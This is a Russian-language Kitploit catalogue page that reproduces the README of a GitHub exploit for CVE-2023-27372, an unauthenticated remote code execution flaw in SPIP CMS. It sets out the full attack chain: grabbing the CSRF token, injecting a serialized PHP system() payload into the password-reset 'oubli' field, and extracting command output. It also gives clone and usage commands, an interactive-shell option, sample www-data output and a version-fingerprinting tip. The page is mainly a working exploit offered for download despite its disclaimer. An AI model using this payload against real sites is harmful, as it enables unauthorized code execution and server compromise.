Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-27372 — Эксплойт для CVE-2023-27372 с интерактивной оболочкой | Kitploit
Инструменты/GitHubGitHub/scriniariii/cve-2023-27372
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubscriniariii/cve-2023-27372

CVE-2023-27372

Эксплойт для CVE-2023-27372 с интерактивной оболочкой

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-27372 Exploit

Эксплойт для CVE-2023-27372 — уязвимости удалённого выполнения кода без аутентификации в CMS SPIP, затрагивающей версии до 4.2.1.

⚠️ Только в образовательных целях. Используйте исключительно на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение. Несанкционированное использование незаконно.


Обзор

SPIP — это открытая CMS, широко используемая для веб-публикаций. Эта уязвимость существует в форме восстановления пароля (/spip.php?page=spip_pass), где параметр oubli обрабатывается без надлежащей санитизации, что позволяет атакующему внедрить и выполнить произвольный PHP-код на сервере — без необходимости аутентификации.

ПолеДетали
CVECVE-2023-27372
Оценка CVSS9.8 (Critical)
Вектор атакиСеть
АутентификацияНе требуется
Затронутые версииSPIP < 4.2.1
Тип уязвимостиВнедрение кода / RCE без аутентификации

Как это работает

  1. Получение CSRF-токена — Выполняется GET-запрос к /spip.php?page=spip_pass для извлечения токена formulaire_action_args из HTML-формы.

  2. Формирование полезной нагрузки — Создаётся PHP-сериализованная строка с командой для выполнения:

    root@kitploit:~
    s:N:"<?php system('COMMAND'); ?>";
    

    Где N — точная длина внутренней PHP-строки в байтах.

  3. Отправка полезной нагрузки — Выполняется POST-запрос с сформированной полезной нагрузкой в поле oubli вместе с CSRF-токеном. SPIP обрабатывает это поле без санитизации и выполняет внедрённый PHP-код.

  4. Извлечение вывода — Вывод команды возвращается внутри HTML-ответа и извлекается из атрибута value поля ввода oubli.

Требования

  • Python 3.x
  • requests
  • beautifulsoup4
  • argparse
  • regex

Установка

root@kitploit:~

git clone https://github.com/scriniarii/CVE-2023-27372

cd CVE-2023-27372

pip install requests beautifulsoup4

Использование

root@kitploit:~
python3 exploit.py -u <URL> -c <command>
АргументОписание
-u, --urlБазовый URL целевого экземпляра SPIP

Пример

root@kitploit:~

python3 exploit.py -u http://TARGET/ -c "id"
root@kitploit:~

python3 exploit.py -u http://TARGET/ -s

Ожидаемый вывод:

root@kitploit:~
[+] Token found : JWDCxt5PTFzhPb...
 
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Затронутые версии

Чтобы проверить версию SPIP на цели, найдите мета-тег generator в HTML:

root@kitploit:~
<meta name="generator" content="SPIP 4.2.0" />

[!CAUTION]
⚠️ Отказ от ответственности
Пожалуйста, используйте информацию и эксплойты, предоставленные в моих репозиториях, только в образовательных целях и для ответственного раскрытия уязвимостей. Я не несу ответственности за любое неправомерное использование или ущерб, причинённый в результате использования этих инструментов, скриптов или эксплойтов.

Скачать инструмент
-c, --commandКоманда ОС для выполнения на цели
-s, --shellИнтерактивная оболочка